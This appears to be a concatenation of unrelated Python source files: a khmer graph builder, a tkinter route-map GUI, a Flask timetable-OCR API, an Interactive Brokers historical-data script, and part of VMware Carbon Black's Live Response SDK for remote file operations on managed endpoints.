- ifilenames: list of input files
- graph: existing graph
- num_threads: number of threads (optional)
- tags: should there be tags
"""
if tags:
eat = graph.consume_fasta_and_tag_with_reads_parser
else:
eat = graph.consume_fasta_with_reads_parser
for _, ifile in enumerate(ifilenames):
rparser = khmer.ReadParser(ifile)
threads = []
for _ in range(num_threads):
cur_thread = threading.Thread(target=eat, args=(rparser,))
threads.append(cur_thread)
cur_thread.start()
for thread in threads:
thread.join()
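# Hedged usage sketch (added, not in the original): one way build_graph might be
# driven. The k-mer size, table sizing and read file names are illustrative
# assumptions, not values mandated by khmer.
#   import khmer
#   graph = khmer.Countgraph(31, int(1e7), 4)
#   build_graph(["reads_1.fa", "reads_2.fa"], graph, num_threads=2)
#   print("unique k-mers:", graph.n_unique_kmers())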
|
mapFrame.py
|
"""
Main frame holding the map image, onto which the path to travel is drawn
"""
from random import randrange # random colour generation
from tkinter import * # GUI
from tkinter import ttk # better/other widgets
from PIL import ImageTk, Image, ImageDraw, ImageFont # image handling
from time import sleep # used in threads to wait
from threading import Thread # multithreading (auto resizing and delayed destroying of widgets)
from prim_lib import PRIM # class to interact with the prim algorithm
PATH_TO_MAP = 'assets/map.png'
PATH_TO_BTN = 'assets/search.png'
POS_VILLES = ( # format (x, y), same order as villes list
(602, 638), (340, 730),(270, 875),(481, 864),(765, 894),(905, 850),(260, 484),(259, 390),(548, 305),
(595, 95),(737, 473),(730, 719),(549, 725),(514, 416),(667, 255),(935, 334),(470, 627),
(670, 363),(385, 235),(258, 213),(49, 355),(342, 579)
)
class MapFrame(Frame):
def __init__(self, master) -> None:
super().__init__(master)
self.master = master
self.choice = None
self.path_showed = False
self.prim = PRIM()
"""Interface with the prim library"""
self.__path_colors = {0:"#000000"}
"""List of the colors for path rendering (path 0 is black)"""
self.__selection_widgets = {}
"""Dictionary which contains the widgets for the names, and eventually a thread to destroy them (after losing focus)\n
Format is : dict[cityIndex: int, list[Widget, () || Thread]]"""
# =======================================
# IMAGES
# map image
self.mapImg = Image.open(PATH_TO_MAP)
"""Pillow object for map image (can be resized)"""
self.mapImgTk = ImageTk.PhotoImage(self.mapImg)
"""Tkinter object for map image (cannot be resized)"""
# search icon for button
img_btn = Image.open(PATH_TO_BTN)
self.btnImg = ImageTk.PhotoImage(img_btn)
# =======================================
self.__create_widgets()
self.pack()
def __create_widgets(self):
def scale_changed():
if self.path_showed:
self.__reset_image()
self.show_path()
self.mapLabel = Label(self, text='map', image=self.mapImgTk)
self.mapLabel.pack()
self.primBtn = ttk.Button(self, text='Search path...', command=self.show_path,
image=self.btnImg, state=DISABLED)
self.primBtn.place(relx=.05, rely=.6)
self.scale_voyageur = ttk.Spinbox(self, width=5, background=self["background"],
from_=1, to=len(POS_VILLES), increment=1.0, font=20, command=scale_changed)
self.scale_voyageur.set(1)
self.scale_voyageur.place(relx=.05, rely=.75)
def __reset_image(self):
self.mapImg = Image.open(PATH_TO_MAP)
win_size = self.master.size
img = self.mapImg.resize(tuple(win_size))
self.mapImgTk = ImageTk.PhotoImage(img)
self.mapLabel['image'] = self.mapImgTk
self.path_showed = False
def show_selection(self, x: int, y: int):
"""Func called by a Motion event sent by Tk window.\n
Renders the widgets for cities close to the mouse cursor, that can be clicked to chose it as the starting city"""
def on_click(event):
name = event.widget['text'].split('\n')[0]
index_ville = self.master.villes.index(name)
if self.choice == index_ville:
self.choice = None
event.widget['text'] = name
event.widget['background'] = '#A8B8FF'
self.primBtn['state'] = DISABLED
else:
self.choice = index_ville
event.widget['text'] += '\n(départ)'
event.widget['background'] = '#FF5858'
self.primBtn['state'] = NORMAL
# reset the map image
self.__reset_image()
event.widget.update()
width, height = self.master.size
x_factor = 1000 / width
y_factor = 1000 / height
for (xv, yv), i in zip(POS_VILLES, range(len(POS_VILLES))):
name = self.master.villes[i]
if abs(xv / x_factor - x) < 50 / x_factor and abs(yv / y_factor - y) < 50 / x_factor: # close to the city
if not i in self.__selection_widgets.keys():
w = Label(self, text=name, background='#A8B8FF', font=('Arial', int(10 + 6 / x_factor)), name=name)
w.bind('<1>', on_click)
w.place(x=xv / x_factor - 5 * len(name), y=yv / y_factor)
self.__selection_widgets[i] = [w, ()]
else:
if i in self.__selection_widgets.keys():
if not self.__selection_widgets[i][1]: # there is no active remove thread for this widget
remove_thread = Thread(target=self.__remove_name_widget, args=(i,))
remove_thread.setDaemon(True) # to prevent error when closing main program
remove_thread.start()
self.__selection_widgets[i][1] = remove_thread
def __remove_name_widget(self, i):
"""Thread created when a widget *looses focus* (isn't close to mouse cursor)\n
Destroy it if it isn't the start choice, after .5 seconds"""
sleep(.5)
name = self.__selection_widgets[i][0]['text'].split('\n')[0]
index_ville = self.master.villes.index(name)
while self.choice == index_ville:
sleep(.5)
self.__selection_widgets[i][0].destroy()
self.__selection_widgets.pop(i)
def resize_map(self):
"""Used in an external thread, each .1 seconds, checks if the window size changed.\n
If yes, resize the map to fit in the new size"""
pred_size = []
while 1:
img = Image.open(PATH_TO_MAP)
# get the MapFrame size
self.master.size = () # update the size
win_size = list(self.master.size)
if win_size != pred_size: # size changed
# resize the image in the available space
img = self.mapImg.resize(tuple(win_size))
# reset the image to update the map label
self.mapImgTk = ImageTk.PhotoImage(img)
self.mapLabel['image'] = self.mapImgTk
pred_size = [*win_size]
sleep(.1)
def show_path(self):
"""Func called by the search button or when the scale is activated and a path is already shown.\n
Renders the path(s) of each traveler(s), with colored line between cities and numeric order"""
# execute the algorithm to find the path
self.prim.execute(self.choice, int(self.scale_voyageur.get()))
#self.prim.execute(self.choice, int(self.scale_voyageur.get()), True) # """upgraded""" algorithm
self.prim.upgrade()
paths = self.prim.npaths
print("max len path :", self.prim.len_max)
# add the order to the cities
draw = ImageDraw.Draw(self.mapImg) # drawing object
# add the lines between each city and the order numbers
for i, path in paths.items():
if i in self.__path_colors.keys():
color = self.__path_colors[i]
else:
color = '#{}{}{}'.format(*[
hex(randrange(0, 200))[2:].zfill(2)
for _ in range(3)])
self.__path_colors[i] = color
for D, A in zip(path, path[1:]):
draw.line((POS_VILLES[D], POS_VILLES[A]), color, 5)
for n, j in zip(path[:-1], range(len(path))):
fnt = ImageFont.truetype("assets/arial.ttf", 30)
draw.rectangle((POS_VILLES[n], tuple([pos + 30 for pos in POS_VILLES[n]])), fill='white')
draw.text(POS_VILLES[n], f'{j}', fill=color, font=fnt)
# update the map image
win_size = self.master.size
img = self.mapImg.resize(tuple(win_size))
self.mapImgTk = ImageTk.PhotoImage(img)
self.mapLabel['image'] = self.mapImgTk
self.primBtn['state'] = DISABLED
self.path_showed = True
|
flesk_api.py
|
import cv2, numpy, requests, time, pytesseract, flask, os, json, threading, pymysql.cursors
from datetime import datetime
from collections import Counter
from pdf2image import convert_from_bytes
from flask import request, jsonify
app = flask.Flask(__name__)
app.config["DEBUG"] = True
##### MySQL parameters #####
HOST = "HOST" #
USER = "USER" #
PASSWORD = "PASSWORD" #
DB = "DB" #
##########################
# Helper to fetch all matching rows from the database
def MySQLFetchAll(SQLString):
connection = pymysql.connect(host=HOST,user=USER,password=PASSWORD,db=DB,cursorclass=pymysql.cursors.DictCursor,charset="utf8")
try:
with connection.cursor() as cursor:
cursor.execute(SQLString)
result = cursor.fetchall()
finally:
connection.close()
return result
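# Hedged usage note (added, not in the original): because DictCursor is used,
# MySQLFetchAll returns a list of dicts, e.g.
#   rows = MySQLFetchAll("SELECT localvalue FROM Outtable WHERE shortname='outjson'")
#   print(rows[0]["localvalue"])
# The table and column names simply mirror the query used in get_json() below.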
def ParseKIPTT(pdfid):
leftnumber_cell_list = []
group_cell_list = []
circle_store_list = []
box_store_list = []
finalmatrix = []
group_text_association = {}
center_and_text = {}
#Функция для записи в БД
def MySQLWriter(insertjson):
cnx = pymysql.connect(host=HOST,user=USER,password=PASSWORD,db=DB,cursorclass=pymysql.cursors.DictCursor,charset="utf8")
cur = cnx.cursor()
insert = "UPDATE Outtable SET localvalue = %s WHERE shortname=\"outjson\";"
try:
cur.execute(insert, (json.dumps(insertjson,ensure_ascii=False),))
cnx.commit()
finally:
cnx.close()
def get_document():
url = "http://46.101.17.171/PDF/"+pdfid+".pdf"
r = requests.get(url, stream=True)
with open('PDF.pdf', 'wb') as fd:
for chunk in r.iter_content(2000):
fd.write(chunk)
pages = convert_from_bytes(open('PDF.pdf', 'rb').read(),300)
for page in pages:
page.save('PNG.png', 'PNG')
# Guard so that a contour does not become huge
def check_res(firstflag, old, new):
if firstflag == True:
return True
else:
return new[1][0]<(old[1][0]+(old[1][0]/100)*80) and new[1][1]<(old[1][1]+(old[1][1]/100)*80)
# Lay the detected circle centres out as a matrix
def matrix(rows,columns):
matrix = []
counter = 0
circle_store_list.sort(key=lambda x: (x[1]),reverse=True)
for i in range(columns):
matrix.append([])
for j in range(rows):
matrix[i].append(circle_store_list[counter])
counter +=1
for item in matrix:
item.sort(key=lambda x: (x[0]))
i = len(matrix)-1
while i != -1:
finalmatrix.append(matrix[i])
i -=1
# Check a circle centre against all stored centres within tolerance
def allcenters_checker(center):
for item in circle_store_list:
if ((item[0] == center[0]) and (abs(item[1]-center[1])<8)) or ((item[1] == center[1]) and (abs(item[0]-center[0])<8)):
return False
return True
# Check that a contour does not include the lesson-number cells
def leftnumberchecker(box):
for item in leftnumber_cell_list:
for boxitem in box:
for p in range(0,len(item)-2):
if (item[p][0],item[p][1]) == (boxitem[0], boxitem[1]):
return False
return True
# Check that a contour does not include the group title cells
def titlechecker(box):
for item in group_cell_list:
for boxitem in box:
for p in range(1,len(item)-1):
if (item[p][0],item[p][1]) == (boxitem[0], boxitem[1]):
return False
return True
# Tolerance comparison for circle centres
def centers_checker(a,b):
boolflag0 = False
boolflag1 = False
if (abs(a[0]-b[0]) < 10):
boolflag0 = True
if (abs(a[1]-b[1]) < 10):
boolflag1 = True
if boolflag1 == True and boolflag0 == True:
return True
return False
# Detect empty (null) lesson slots
def get_null_values(timg,image):
outchecklist = []
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (145, 145)) # minimum size; to let more through, use 180
closed = cv2.morphologyEx(timg, cv2.MORPH_CLOSE, kernel)
cnts = cv2.findContours(closed.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[1]
firstflag = True
old_center = (0, 0)
old_rect = ((0.0, 0.0), (0.0, 0.0), -0.0)
for c in cnts:
rect = cv2.minAreaRect(c)
box = cv2.boxPoints(rect)
box = numpy.int0(box)
center = (int(rect[0][0]),int(rect[0][1]))
if (check_res(firstflag,old_rect,rect) == True) and (AreaChecker(rect) == True) and (centers_checker(center,old_center) == False) and (titlechecker(box) == True):
for item in box_store_list:
locale_counter = 0
for p in item:
for insidep in box:
if (abs(insidep[0]-p[0])<10) and (abs(insidep[1]-p[1])<10):
locale_counter +=1
if locale_counter == 4:
firstflag = False
outchecklist.append(center)
old_rect = rect
old_center = center
cv2.drawContours(image,[box],0,(0,0,255),5)
cv2.circle(image, center, 5, (0,0,255), 5)
for nullitem in outchecklist:
for item in finalmatrix:
for i in range(len(item)):
if (abs(nullitem[0]-item[i][0])<10) and (abs(nullitem[1]-item[i][1])<10):
item.remove(item[i])
item.insert(i,(0,0))
for item in finalmatrix:
for i in range(len(item)):
if item[i] == (0,0):
item.remove(item[i])
item.insert(i,"-")
else:
bufitem = item[i]
item.remove(bufitem)
item.insert(i,center_and_text[bufitem])
def finalmatrix_to_json(groupcheck):
allgroups = []
outjson = {}
for item in groupcheck:
allgroups.append(item[1])
for i in range(len(finalmatrix[0])):
outjson[allgroups[i]] = []
for j in range(len(finalmatrix)):
outjson[allgroups[i]].append(finalmatrix[j][i])
return outjson
# Filter by area/perimeter
def AreaChecker(res):
area = int(res[1][0]*res[1][1])
if (area > 20000) and (area < 500000) and (res[1][0] > 130) and (res[1][1] > 130):
return True
return False
def cropimager(image, box):
TopLeftCoords = (box[0][0], box[0][1])
BottomRightCoords = TopLeftCoords
for p in box:
if p[0]<=TopLeftCoords[0] and p[1]<=TopLeftCoords[1]:
TopLeftCoords = (p[0],p[1])
if p[0]>=BottomRightCoords[0] and p[1]>=BottomRightCoords[1]:
BottomRightCoords = (p[0],p[1])
return image[TopLeftCoords[1]+1:BottomRightCoords[1],TopLeftCoords[0]+1:BottomRightCoords[0]]
def grouptextchecker(text):
formatedtext = "".join(text.split())
while formatedtext[-1:].isnumeric() == False:
formatedtext = formatedtext[:-1]
formatedtext = formatedtext[::-1]
while formatedtext[-1:].isnumeric() == False:
formatedtext = formatedtext[:-1]
return formatedtext[::-1]
def main():
get_document()
RowCheckerList=[]
ColumnCheckerList=[]
firstflag = True
image = cv2.imread("PNG.png")
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (3, 3), 0)
edged = cv2.Canny(gray, 10, 250)
cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[1]
old_center = (0, 0)
for c in cnts:
rect = cv2.minAreaRect(c)
box = cv2.boxPoints(rect)
box = numpy.int0(box)
center = (int(rect[0][0]),int(rect[0][1]))
# Lesson numbers (left-hand column)
if (rect[1][0] < 200) and (rect[1][0] > 34) and (rect[1][1] < 600) and (rect[1][0] < rect[1][1]) and (rect[0][0] < rect[0][1]):
for p in box:
cv2.circle(image, (p[0],p[1]), 5, (255,0,255), 5)
cv2.drawContours(image,[box],0,(255,0,255),5)
cv2.circle(image, center, 5, (255,0,255), 5)
leftnumber_cell_list.append(box)
# Group titles
elif (rect[1][1] < 100) and (rect[1][1] > 20) and (rect[1][0] > 120) and (rect[1][0] > rect[1][1]) and (rect[0][0] > rect[0][1]) and (centers_checker(center,old_center) == False) and (rect[1][0] < 500):
crop_img = cropimager(image, box)
text = pytesseract.image_to_string(crop_img, lang='rus')
group_text_association[center] = grouptextchecker(text)
old_center = center
for p in box:
cv2.circle(image, (p[0],p[1]), 5, (0,255,0), 5)
cv2.drawContours(image,[box],0,(0,255,0),5)
cv2.circle(image, center, 5, (0,255,0), 5)
group_cell_list.append(box)
# Walk over the contours
sorted_by_value = sorted(group_text_association.items(), key=lambda kv: kv[0])
global_counter = 0
old_center = (0, 0)
old_rect = ((0.0, 0.0), (0.0, 0.0), -0.0)
for c in cnts:
rect = cv2.minAreaRect(c)
box = cv2.boxPoints(rect)
box = numpy.int0(box)
center = (int(rect[0][0]),int(rect[0][1]))
if (check_res(firstflag,old_rect,rect) == True) and (AreaChecker(rect) == True) and (centers_checker(center,old_center) == False) and (allcenters_checker(center) == True) and (titlechecker(box) == True) and (leftnumberchecker(box) == True):
firstflag = False
circle_store_list.append(center)
box_store_list.append(box)
old_rect = rect
old_center = center
cv2.drawContours(image,[box],0,(128,0,0),5)
crop_img = cropimager(image, box)
text = pytesseract.image_to_string(crop_img, lang='rus')
center_and_text[center] = text.replace("\n"," ").replace(" "," ").replace("\n\n"," ")
# Collect the centres so the number of repetitions can be counted
ColumnCheckerList.append(center[0])
RowCheckerList.append(center[1])
global_counter +=1
# Count the repetitions
RowCounter = Counter(RowCheckerList)
ColumnCounter = Counter(ColumnCheckerList)
# Find the maximum elements in the structured counters
MaxRow = 0
MaxColumn = 0
for item in list(RowCounter):
if (RowCounter[item]>MaxRow):
MaxRow=RowCounter[item]
for item in list(ColumnCounter):
if (ColumnCounter[item]>MaxColumn):
MaxColumn=ColumnCounter[item]
if not os.path.exists("outputs"):
os.makedirs("outputs")
if global_counter == MaxRow*MaxColumn:
matrix(MaxRow,MaxColumn)
get_null_values(edged.copy(),image)
cv2.imwrite("outputs/output"+str(datetime.now())+"_GOOD.png", image)
MySQLWriter(finalmatrix_to_json(sorted_by_value))
else:
cv2.imwrite("outputs/output"+str(datetime.now())+"_BAD.png", image)
main()
@app.route('/api/v1/parse_json/', methods=['GET'])
def parse_json():
try:
pdf_id = request.args.get('pdfid', '')
threading.Thread(target=ParseKIPTT, args=(pdf_id,)).start()
return "True"
except:
return "False"
@app.route('/api/v1/get_json/', methods=['GET'])
def get_json():
return (MySQLFetchAll("SELECT localvalue FROM Outtable WHERE shortname='outjson'")[0]["localvalue"])
app.run(host='127.0.0.1',port=500, threaded=False)
|
ib_hist_general_stk.py
|
# -*- coding: utf-8 -*-
"""
IBAPI - Getting historical data for stocks from different exchanges and geographies
@author: Mayank Rasu (http://rasuquant.com/wp/)
"""
# Import libraries
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from ibapi.contract import Contract
import pandas as pd
import threading
import time
class TradeApp(EWrapper, EClient):
def __init__(self):
EClient.__init__(self, self)
self.data = {}
def historicalData(self, reqId, bar):
if reqId not in self.data:
self.data[reqId] = [{"Date":bar.date,"Open":bar.open,"High":bar.high,"Low":bar.low,"Close":bar.close,"Volume":bar.volume}]
else:
self.data[reqId].append({"Date":bar.date,"Open":bar.open,"High":bar.high,"Low":bar.low,"Close":bar.close,"Volume":bar.volume})
print("reqID:{}, date:{}, open:{}, high:{}, low:{}, close:{}, volume:{}".format(reqId,bar.date,bar.open,bar.high,bar.low,bar.close,bar.volume))
def websocket_con():
app.run()
app = TradeApp()
app.connect("127.0.0.1", 7497, clientId=1)
# starting a separate daemon thread to execute the websocket connection
con_thread = threading.Thread(target=websocket_con, daemon=True)
con_thread.start()
time.sleep(1) # some latency added to ensure that the connection is established
#creating object of the Contract class - will be used as a parameter for other function calls
def generalStk(symbol,currency,exchange,sec_type="STK"):
contract = Contract()
contract.symbol = symbol
contract.secType = sec_type
contract.currency = currency
contract.exchange = exchange
return contract
def histData(req_num,contract,duration,candle_size):
app.reqHistoricalData(reqId=req_num,
contract=contract,
endDateTime='',
durationStr=duration,
barSizeSetting=candle_size,
whatToShow='ADJUSTED_LAST',
useRTH=1,
formatDate=1,
keepUpToDate=0,
chartOptions=[]) # EClient function to request contract details
tickers_data = {"INTC" : {"index":0,"currency":"USD","exchange":"ISLAND"},
"BARC" : {"index":1,"currency":"GBP","exchange":"LSE"},
"INFY" : {"index":2,"currency":"INR","exchange":"NSE"}}
for ticker in tickers_data:
histData(tickers_data[ticker]["index"],
generalStk(ticker,tickers_data[ticker]["currency"],tickers_data[ticker]["exchange"]),
'1 M', '5 mins')
time.sleep(5) # some latency added to ensure that the contract details request has been processed
###################storing trade app object in dataframe#######################
def dataDataframe(ticker_data,TradeApp_obj):
"returns extracted historical data in dataframe format"
df_data = {}
for symbol in ticker_data:
try:
df_data[symbol] = pd.DataFrame(TradeApp_obj.data[ticker_data[symbol]["index"]])
df_data[symbol].set_index("Date",inplace=True)
except:
print("error encountered for {} data....skipping".format(symbol))
return df_data
#extract and store historical data in dataframe
historicalData = dataDataframe(tickers_data,app)
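# Hedged usage note (added, not in the original): once the requests above have
# completed, the per-ticker dataframes can be inspected directly; the column
# names follow the dicts built in historicalData() above.
#   print(historicalData["INTC"].tail())
#   print(historicalData["INTC"]["Close"].pct_change().dropna().head())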
|
live_response_api.py
|
#!/usr/bin/env python3
# *******************************************************
# Copyright (c) VMware, Inc. 2020-2021. All Rights Reserved.
# SPDX-License-Identifier: MIT
# *******************************************************
# *
# * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
# * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
# * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
# * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
# * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""The Live Response API and associated objects."""
from __future__ import absolute_import
from collections import defaultdict
from concurrent.futures import _base, ThreadPoolExecutor
import json
import logging
import queue
import random
import shutil
import string
import threading
import time
from cbc_sdk.platform import Device
from cbc_sdk.errors import TimeoutError, ObjectNotFoundError, ApiError
from cbc_sdk import winerror
OS_LIVE_RESPONSE_ENUM = {
"WINDOWS": 1,
"LINUX": 2,
"MAC": 4
}
log = logging.getLogger(__name__)
class LiveResponseError(Exception):
"""Exception raised for errors with Live Response."""
def __init__(self, details):
"""
Initialize the LiveResponseError.
Args:
details (object): Details of the specific error.
"""
message_list = []
self.details = details
self.win32_error = None
self.decoded_win32_error = ""
# Details object:
# {u'status': u'error', u'username': u'admin', u'device_id': 9, u'name': u'kill',
# u'completion': 1464319733.190924, u'object': 1660, u'session_id': 7, u'result_type': u'WinHresult',
# u'create_time': 1464319733.171967, u'result_desc': u'', u'id': 22, u'result_code': 2147942487}
if self.details.get("status").upper() == "ERROR" and self.details.get("result_type") == "WinHresult":
# attempt to decode the win32 error
win32_error_text = "Unknown Win32 error code"
try:
self.win32_error = int(self.details.get("result_code"))
win32_error_text = "Win32 error code 0x%08X" % (self.win32_error,)
self.decoded_win32_error = winerror.decode_hresult(self.win32_error)
if self.decoded_win32_error:
win32_error_text += " ({0})".format(self.decoded_win32_error)
except Exception:
pass
finally:
message_list.append(win32_error_text)
self.message = ": ".join(message_list)
def __str__(self):
"""
Return the string equivalent of this exception (the exception's message).
Returns:
str: The exception's message.
"""
return self.message
class CbLRSessionBase(object):
"""A Live Response session that interacts with a remote machine."""
MAX_RETRY_COUNT = 5
def __init__(self, cblr_manager, session_id, device_id, session_data=None, thread_pool_count=5):
"""
Initialize the CbLRSessionBase.
Args:
cblr_manager (CbLRManagerBase): The Live Response manager governing this session.
session_id (str): The ID of this session.
device_id (int): The ID of the device (remote machine) we're connected to.
session_data (dict): Additional session data.
thread_pool_count (int): number of workers for async commands (optional)
"""
self.session_id = session_id
self.device_id = device_id
self._cblr_manager = cblr_manager
self._cb = cblr_manager._cb
self._async_executor = None
self._thread_pool_count = thread_pool_count
# TODO: refcount should be in a different object in the scheduler
self._refcount = 1
self._closed = False
self.session_data = session_data
self.os_type = None
self.cblr_base = self._cblr_manager.cblr_base.format(self._cb.credentials.org_key)
def __enter__(self):
"""Enter the Live Response session context."""
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Exit the Live Response session context.
Args:
exc_type (str): Exception type, if any.
exc_val (Exception): Exception value, if any.
exc_tb (str): Exception traceback, if any.
"""
self.close()
def _async_submit(self, func, *args, **kwargs):
"""
Submit a task to the executor, creating it if it doesn't yet exist.
Args:
func (func): A callable to be executed as a background task.
*args (list): Arguments to be passed to the callable.
**kwargs (dict): Keyword arguments to be passed to the callable.
Returns:
Future: A future object representing the background task, which will pass along the result.
"""
if not self._async_executor:
self._async_executor = ThreadPoolExecutor(max_workers=self._thread_pool_count)
return self._async_executor.submit(func, args, kwargs)
def command_status(self, command_id):
"""
Check the status of async command
Args:
command_id (int): command_id
Returns:
status of the command
"""
url = "{cblr_base}/sessions/{0}/commands/{1}".format(self.session_id, command_id, cblr_base=self.cblr_base)
res = self._cb.get_object(url)
return res["status"].upper()
def cancel_command(self, command_id):
"""
Cancel command if it is in status PENDING.
Args:
command_id (int): command_id
"""
url = "{cblr_base}/sessions/{0}/commands/{1}".format(self.session_id, command_id, cblr_base=self.cblr_base)
res = self._cb.get_object(url)
if res["status"].upper() == 'PENDING':
self._cb.delete_object(url)
else:
raise ApiError(f'Cannot cancel command in status {res["status"].upper()}.'
' Only commands in status PENDING can be cancelled.')
def close(self):
"""Close the Live Response session."""
self._cblr_manager.close_session(self.device_id, self.session_id)
self._closed = True
#
# File operations
#
def _submit_get_file(self, file_name):
"""Helper function for submitting get file command"""
data = {"name": "get file", "path": file_name}
resp = self._lr_post_command(data).json()
file_details = resp.get('file_details', None)
if file_details:
file_id = file_details.get('file_id', None)
command_id = resp.get('id', None)
return file_id, command_id
return None, None
def get_raw_file(self, file_name, timeout=None, delay=None, async_mode=False):
"""
Retrieve contents of the specified file on the remote machine.
Args:
file_name (str): Name of the file to be retrieved.
timeout (int): Timeout for the operation.
delay (float): Delay in seconds to wait before command complete.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
object: Contains the data of the file.
"""
file_id, command_id = self._submit_get_file(file_name)
if file_id and command_id:
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._get_raw_file(command_id,
file_id,
timeout,
delay))
else:
return self._get_raw_file(command_id, file_id, timeout, delay)
def _get_raw_file(self, command_id, file_id, timeout=None, delay=None):
self._poll_command(command_id, timeout=timeout, delay=delay)
response = self._cb.session.get("{cblr_base}/sessions/{0}/files/{1}/content".format(
self.session_id, file_id, cblr_base=self.cblr_base), stream=True)
response.raw.decode_content = True
return response.raw
def get_file(self, file_name, timeout=None, delay=None, async_mode=False):
"""
Retrieve contents of the specified file on the remote machine.
Args:
file_name (str): Name of the file to be retrieved.
timeout (int): Timeout for the operation.
delay (float): Delay in seconds to wait before command complete.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
str: Contents of the specified file.
"""
def _get_file():
"""Helper function to get the content of a file"""
fp = self._get_raw_file(command_id, file_id, timeout=timeout, delay=delay)
content = fp.read()
fp.close()
return content
file_id, command_id = self._submit_get_file(file_name)
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: _get_file())
return _get_file()
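    # Illustrative sketch, not part of the SDK: fetching a file synchronously and
    # asynchronously. Assumes `lr_session` was obtained via device.lr_session().
    #
    #     contents = lr_session.get_file(r'c:\test.txt')
    #     command_id, future = lr_session.get_file(r'c:\test.txt', async_mode=True)
    #     contents = future.result()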
def delete_file(self, filename, async_mode=False):
"""
Delete the specified file name on the remote machine.
Args:
filename (str): Name of the file to be deleted.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "delete file", "path": filename}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def put_file(self, infp, remote_filename, async_mode=False):
r"""
Create a new file on the remote machine with the specified data.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... lr_session.put_file(open("test.txt", "rb"), r"c:\test.txt")
Args:
infp (object): Python file-like containing data to upload to the remote endpoint.
remote_filename (str): File name to create on the remote endpoint.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "put file", "path": remote_filename}
file_id = self._upload_file(infp)
data["file_id"] = file_id
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def list_directory(self, dir_name, async_mode=False):
r"""
List the contents of a directory on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... pprint.pprint(lr_session.list_directory('C:\\\\temp\\\\'))
[{u'attributes': [u'DIRECTORY'],
u'create_time': 1471897244,
u'filename': u'.',
u'last_access_time': 1476390670,
u'last_write_time': 1476390670,
u'size': 0},
{u'attributes': [u'DIRECTORY'],
u'create_time': 1471897244,
u'filename': u'..',
u'last_access_time': 1476390670,
u'last_write_time': 1476390670,
u'size': 0},
{u'attributes': [u'ARCHIVE'],
u'create_time': 1476390668,
u'filename': u'test.txt',
u'last_access_time': 1476390668,
u'last_write_time': 1476390668,
u'size': 0}]
Args:
dir_name (str): Directory to list. This parameter should end with the path separator.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
list: A list of dicts, each one describing a directory entry.
"""
data = {"name": "directory list", "path": dir_name}
resp = self._lr_post_command(data).json()
command_id = resp.get("id")
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id).get("files", []))
return self._poll_command(command_id).get("files", [])
def create_directory(self, dir_name, async_mode=False):
"""
Create a directory on the remote machine.
Args:
dir_name (str): The new directory name.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "create directory", "path": dir_name}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def _pathsep(self):
"""
Return the path separator used on the target node.
Returns:
str: Path separator used on the target node.
"""
if self.os_type == 1:
# Windows
return "\\"
# Unix/Mac
return '/'
def _path_compose(self, base, new_component, add_end=False):
"""
Compose a new path based on a base and a new component.
Args:
base (str): The base path to be used.
new_component (str): The new component to be appended.
add_end (bool): True to add an extra path separator at the end. Default False.
Returns:
str: The composed path.
"""
sep = self._pathsep()
rc = [base]
if not base.endswith(sep):
rc.append(sep)
rc.append(new_component)
if add_end:
rc.append(sep)
return "".join(rc)
def _path_islink(self, fi):
"""
Determine if the path is a link. Not implemented.
Args:
fi (str): File to check.
Returns:
bool: True if the file is a link, False if not.
"""
# TODO: implement
return False
def walk(self, top, topdown=True, onerror=None, followlinks=False):
r"""
Perform a full directory walk with recursion into subdirectories on the remote machine.
Note: walk does not support async_mode due to its behaviour, it can only be invoked synchronously
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... for entry in lr_session.walk(directory_name):
... print(entry)
('C:\\temp\\', [u'dir1', u'dir2'], [u'file1.txt'])
Args:
top (str): Directory to recurse on.
topdown (bool): If True, start output from top level directory.
onerror (func): Callback if an error occurs. This function is called with one argument (the exception
that occurred).
followlinks (bool): True to follow symbolic links.
Returns:
list: List of tuples containing directory name, subdirectory names, file names.
"""
try:
allfiles = self.list_directory(self._path_compose(top, '*'))
except Exception as err:
if onerror is not None:
onerror(err)
return
dirnames = []
filenames = []
for fn in allfiles:
if "DIRECTORY" in fn["attributes"]:
if fn["filename"] not in (".", ".."):
dirnames.append(fn)
else:
filenames.append(fn)
if topdown:
yield top, [fn["filename"] for fn in dirnames], [fn["filename"] for fn in filenames]
for name in dirnames:
new_path = self._path_compose(top, name['filename'], True)
if followlinks or not self._path_islink(new_path):
for x in self.walk(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, [fn["filename"] for fn in dirnames], [fn["filename"] for fn in filenames]
#
# Process operations
